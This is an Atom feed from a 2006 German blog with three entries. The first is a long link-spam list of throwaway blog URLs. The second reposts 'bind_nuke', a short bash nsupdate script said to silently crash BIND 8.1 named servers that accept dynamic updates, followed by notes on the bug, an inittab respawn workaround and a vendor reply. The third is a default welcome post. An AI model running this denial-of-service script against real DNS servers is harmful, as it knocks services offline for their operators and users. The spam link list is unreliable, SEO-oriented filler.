<?xml version="1.0" encoding="iso-8859-1"?>
<feed version="0.3" xmlns="http://purl.org/atom/ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xml:lang="de"> 
<title>aaa sadas das</title> 
<link rel="alternate" type="text/html" href="http://aaaaaa.blognic.net/345_aaa_sadas_das" /> 
 
<modified>2006-03-02T20:06:45Z</modified> 
<tagline></tagline> 
<generator url="http://www.plogworld.net/" version="1.0.1">pLog</generator> 
 
<copyright>Copyright (c) aaaaaa</copyright> 
  
 <entry> 
 <id>tag:post:www.blognic.net,2006-03-02:1564</id>
 <title>Vorstellung: meine Fav-blogs</title> 
 <link rel="alternate" type="text/html" href="http://aaaaaa.blognic.net/345_aaa_sadas_das/archive/1564_vorstellung_meine_fav-blogs.html" /> 
  
 <modified>2006-03-02T20:06:45Z</modified> 
 <issued>2006-03-02T20:06:45</issued> 
 <created>2006-03-02T20:06:45Z</created> 
 <summary type="text/plain">&lt;A href=&quot;http://spammer.blog.de/&quot;&gt;spammer.blog.de/&lt;/A&gt; &lt;A href=&quot;http://blog1.de/aaaaaa&quot;&gt;blog1.de/aaaaaa&lt;/A&gt; &lt;A ...</summary> 
 <author> 
  
 <name>aaaaaa</name> 
 <url>http://aaaaaa.blognic.net/345_aaa_sadas_das</url> 
 <email>seowebspace@web.de</email> 
</author> 
<dc:subject>
Allgemein 
</dc:subject> 
 <content type="text/html" mode="escaped" xml:lang="de" xml:base="http://aaaaaa.blognic.net/345_aaa_sadas_das"> 
 &amp;lt;A href=&amp;quot;http://spammer.blog.de/&amp;quot;&amp;gt;spammer.blog.de/&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://blog1.de/aaaaaa&amp;quot;&amp;gt;blog1.de/aaaaaa&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://geier.blog-writer.de&amp;quot;&amp;gt;eier.blog-writer.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://geier.20six.de/&amp;quot;&amp;gt;geier.20six.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.beeplog.de&amp;quot;&amp;gt;aaaaaa.beeplog.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogecke.de/&amp;quot;&amp;gt;aaaaaa.blogecke.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogg.de&amp;quot;&amp;gt;aaaaaa.blogg.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://bloggermania.de/aaaaaa&amp;quot;&amp;gt;bloggermania.de/aaaaaa&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogianer.de/&amp;quot;&amp;gt;aaaaaa.blogianer.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogya.de/aaaaaa/&amp;quot;&amp;gt;aaaaaa.blogya.de/aaaaaa/&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogy.de&amp;quot;&amp;gt;aaaaaa.blogy.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogtiger.de&amp;quot;&amp;gt;aaaaaa.blogtiger.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogster.de/&amp;quot;&amp;gt;aaaaaa.blogster.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogstart.de&amp;quot;&amp;gt;aaaaaa.blogstart.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogsport.de&amp;quot;&amp;gt;aaaaaa.blogstart.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blognic.net/&amp;quot;&amp;gt;aaaaaa.blognic.net&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.blogger.de&amp;quot;&amp;gt;aaaaaa.blogger.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://blogmonster.de/aaaaaa&amp;quot;&amp;gt;blogmonster.de/aaaaaa&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.yourblog.de/&amp;quot;&amp;gt;aaaaaa.yourblog.de&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.twoday.net/&amp;quot;&amp;gt;aaaaaa.twoday.net&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://www.tell-it.net/dsf_sdf&amp;quot;&amp;gt;www.tell-it.net/dsf_sdf&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.meinweblog.com&amp;quot;&amp;gt;aaaaaa.meinweblog.com&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://www.sponsorblogs.de/aaaaaa/&amp;quot;&amp;gt;www.sponsorblogs.de/aaaaaa&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://myblog.de/bbbbbbb/&amp;quot;&amp;gt;myblog.de/bbbbbbb&amp;lt;/A&amp;gt; &amp;lt;A href=&amp;quot;http://aaaaaa.simpleblog.org/&amp;quot;&amp;gt;aaaaaa.simpleblog.org&amp;lt;/A&amp;gt; ODer KURZ &lt;a href=&quot;http://spammer.blog.de/&quot;&gt;http://spammer.blog.de/&lt;/a&gt; &lt;a href=&quot;http://blog1.de/aaaaaa&quot;&gt;http://blog1.de/aaaaaa&lt;/a&gt; &lt;a href=&quot;http://geier.blog-writer.de&quot;&gt;http://geier.blog-writer.de&lt;/a&gt; &lt;a href=&quot;http://geier.20six.de/&quot;&gt;http://geier.20six.de/&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.beeplog.de&quot;&gt;http://aaaaaa.beeplog.de&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogecke.de/&quot;&gt;http://aaaaaa.blogecke.de/&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogg.de&quot;&gt;http://aaaaaa.blogg.de&lt;/a&gt; &lt;a href=&quot;http://bloggermania.de/aaaaaa&quot;&gt;http://bloggermania.de/aaaaaa&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogianer.de/&quot;&gt;http://aaaaaa.blogianer.de/&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogya.de/aaaaaa/&quot;&gt;http://aaaaaa.blogya.de/aaaaaa/&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogy.de&quot;&gt;http://aaaaaa.blogy.de&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogtiger.de&quot;&gt;http://aaaaaa.blogtiger.de&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogster.de/&quot;&gt;http://aaaaaa.blogster.de/&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogstart.de&quot;&gt;http://aaaaaa.blogstart.de&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogsport.de&quot;&gt;http://aaaaaa.blogsport.de&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blognic.net/&quot;&gt;http://aaaaaa.blognic.net/&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.blogger.de&quot;&gt;http://aaaaaa.blogger.de&lt;/a&gt; &lt;a href=&quot;http://blogmonster.de/aaaaaa&quot;&gt;http://blogmonster.de/aaaaaa&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.yourblog.de/&quot;&gt;http://aaaaaa.yourblog.de/&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.twoday.net/&quot;&gt;http://aaaaaa.twoday.net/&lt;/a&gt; &lt;a href=&quot;http://www.tell-it.net/dsf_sdf&quot;&gt;http://www.tell-it.net/dsf_sdf&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.meinweblog.com&quot;&gt;http://aaaaaa.meinweblog.com&lt;/a&gt; &lt;a href=&quot;http://www.sponsorblogs.de/aaaaaa/&quot;&gt;http://www.sponsorblogs.de/aaaaaa/&lt;/a&gt; &lt;a href=&quot;http://myblog.de/bbbbbbb/&quot;&gt;http://myblog.de/bbbbbbb/&lt;/a&gt; &lt;a href=&quot;http://aaaaaa.simpleblog.org/&quot;&gt;http://aaaaaa.simpleblog.org/&lt;/a&gt;&lt;br/&gt; 
</content> 
</entry> 
 
 <entry> 
 <id>tag:post:www.blognic.net,2006-03-01:1562</id>
 <title>DAS IST DER TITEL</title> 
 <link rel="alternate" type="text/html" href="http://aaaaaa.blognic.net/345_aaa_sadas_das/archive/1562_das_ist_der_titel.html" /> 
  
 <modified>2006-03-01T13:00:15Z</modified> 
 <issued>2006-03-01T13:00:15</issued> 
 <created>2006-03-01T13:00:15Z</created> 
 <summary type="text/plain"> &lt;PRE&gt;--------------------------------------------------&amp;gt;  #!/bin/bash   echo 'bind_nuke c Artur Skawina  skawina@usa.net'    nsupdate &amp;lt;&amp;lt;END  update delete x.$1 A ...</summary> 
 <author> 
  
 <name>aaaaaa</name> 
 <url>http://aaaaaa.blognic.net/345_aaa_sadas_das</url> 
 <email>seowebspace@web.de</email> 
</author> 
<dc:subject>
Allgemein 
</dc:subject> 
 <content type="text/html" mode="escaped" xml:lang="de" xml:base="http://aaaaaa.blognic.net/345_aaa_sadas_das"> 
 &lt;p&gt;&amp;lt;PRE&amp;gt;--------------------------------------------------&amp;amp;gt;&lt;/p&gt;&lt;p&gt;#!/bin/bash&lt;/p&gt;&lt;p /&gt;&lt;p&gt;echo &#039;bind_nuke c Artur Skawina &lt;a href=&quot;mailto:skawina@usa.net&#039;&quot;&gt;skawina@usa.net&#039;&lt;/a&gt;&lt;/p&gt;&lt;p /&gt;&lt;p&gt;nsupdate &amp;amp;lt;&amp;amp;lt;END&lt;/p&gt;&lt;p&gt;update delete x.$1 A&lt;/p&gt;&lt;p&gt;update add x.$1 60 IN A 3.2.3.6&lt;/p&gt;&lt;p&gt;update delete x.$1 A&lt;/p&gt;&lt;p /&gt;&lt;p&gt;END&lt;/p&gt;&lt;p&gt;&amp;amp;lt;--------------------------------------------------&lt;/p&gt;&lt;p /&gt;&lt;p&gt;when executed as &amp;quot;bind_nuke bogus.org&amp;quot; on a host, that bogus.org&#039;s&lt;/p&gt;&lt;p&gt;primary NS is configured to accept updates from, will cause named&lt;/p&gt;&lt;p&gt;to silently die. Nothing in the logs, nothing on the console.&lt;/p&gt;&lt;p&gt;After a number of similar packets has been received by named any&lt;/p&gt;&lt;p&gt;subsequent attempt to run it will only result in a Segmentation Fault.&lt;/p&gt;&lt;p&gt;[and there&#039;s &amp;quot;spoofing&amp;quot;...]&lt;/p&gt;&lt;p /&gt;&lt;p&gt;The problem seems to be that bind can not handle updating the&lt;/p&gt;&lt;p&gt;same RR more than once in the same DNS packet.&lt;/p&gt;&lt;p&gt;And as it saves the update requests in the &amp;amp;lt;zone&amp;amp;gt;.log file&lt;/p&gt;&lt;p&gt;and attempts to perform the updates again when restarted,&lt;/p&gt;&lt;p&gt;the bug is triggered again...&lt;/p&gt;&lt;p /&gt;&lt;p&gt;The bug is present in both bind8.1 and bind8.1.1.&lt;/p&gt;&lt;p&gt;With bind8.1 one such DU packet was enough to prevent named from runing,&lt;/p&gt;&lt;p&gt;until the /var/named/pri/&amp;amp;lt;zone&amp;amp;gt;.log file was removed/edited.&lt;/p&gt;&lt;p&gt;Bind 8.1.1 needs a few packets but usually &amp;amp;lt;=3 before this happens&lt;/p&gt;&lt;p&gt;named still dies after only one packet, but it is sometimes possible to&lt;/p&gt;&lt;p&gt;restart it w/o any immediate errors/warnings.&lt;/p&gt;&lt;p /&gt;&lt;p /&gt;&lt;p&gt;----------------------------------------------------&lt;/p&gt;&lt;p /&gt;&lt;p&gt;This workaround won&#039;t work for the attack listed, but it&#039;s still useful to&lt;/p&gt;&lt;p&gt;know..&lt;/p&gt;&lt;p /&gt;&lt;p&gt;If you&#039;re using named 8.*, it can be run out of inittab with the&lt;/p&gt;&lt;p&gt;non-daemonising switch.&lt;/p&gt;&lt;p /&gt;&lt;p&gt;On linuxen:&lt;/p&gt;&lt;p /&gt;&lt;p&gt;/etc/inittab&lt;/p&gt;&lt;p /&gt;&lt;p&gt;bi:2345:respawn:/usr/sbin/named -f&lt;/p&gt;&lt;p /&gt;&lt;p&gt;At least this way, should it die, it&#039;ll come back within seconds.&lt;/p&gt;&lt;p /&gt;&lt;p&gt;-----------------------------------------------------&lt;/p&gt;&lt;p /&gt;&lt;p /&gt;&lt;p&gt;If you don&#039;t enable updates for a zone, or you enable them only from hosts&lt;/p&gt;&lt;p&gt;within an intelligent source routing prohibited, source addresses checked&lt;/p&gt;&lt;p&gt;firewall, bind is immune to the &amp;quot;bind_nuke&amp;quot; attack published here recently.&lt;/p&gt;&lt;p /&gt;&lt;p&gt;updates aren&#039;t on by default, and according to rfc 2136 dns updates are not&lt;/p&gt;&lt;p&gt;recommended except from &amp;quot;localhost&amp;quot; which is assumed to be secure.  though&lt;/p&gt;&lt;p&gt;i wish that more system vendors would disallow source-address 127.0.0.1 from&lt;/p&gt;&lt;p&gt;coming in off the network.  for this reason we have not published a patch&lt;/p&gt;&lt;p&gt;to bind-8.1.1.  i expect that we will put bind-8.1.2 into beta testing in a&lt;/p&gt;&lt;p&gt;few weeks.  note that we still won&#039;t have support for rfc 2137 or TSIG; if&lt;/p&gt;&lt;p&gt;any system vendors would like to fund that effort, we&#039;d love to work on it.&lt;/p&gt;&lt;p /&gt;&lt;p&gt;mountain.  molehill.&lt;/p&gt;&lt;p /&gt;&lt;p /&gt;&lt;p&gt;------------------------------------------------------&lt;/p&gt;&lt;p&gt;&amp;lt;/PRE&amp;gt;&lt;/p&gt;&lt;br/&gt; 
</content> 
</entry> 
 
 <entry> 
 <id>tag:post:www.blognic.net,2006-02-28:1561</id>
 <title>Herzlichen Gl&amp;uuml;ckwunsch!</title> 
 <link rel="alternate" type="text/html" href="http://aaaaaa.blognic.net/345_aaa_sadas_das/archive/1561_herzlichen_gluumlckwunsch.html" /> 
  
 <modified>2006-02-28T21:15:56Z</modified> 
 <issued>2006-02-28T21:15:56</issued> 
 <created>2006-02-28T21:15:56Z</created> 
 <summary type="text/plain">Wenn Sie diesen Artikel lesen k&ouml;nnen, war die Registrierung erfolgreich und Sie k&ouml;nnen direkt mit dem Bloggen beginnen. </summary> 
 <author> 
  
 <name>aaaaaa</name> 
 <url>http://aaaaaa.blognic.net/345_aaa_sadas_das</url> 
 <email>seowebspace@web.de</email> 
</author> 
<dc:subject>
Allgemein 
</dc:subject> 
 <content type="text/html" mode="escaped" xml:lang="de" xml:base="http://aaaaaa.blognic.net/345_aaa_sadas_das"> 
 Wenn Sie diesen Artikel lesen k&amp;ouml;nnen, war die Registrierung erfolgreich und Sie k&amp;ouml;nnen direkt mit dem Bloggen beginnen.&lt;br/&gt; 
</content> 
</entry> 
 
</feed>
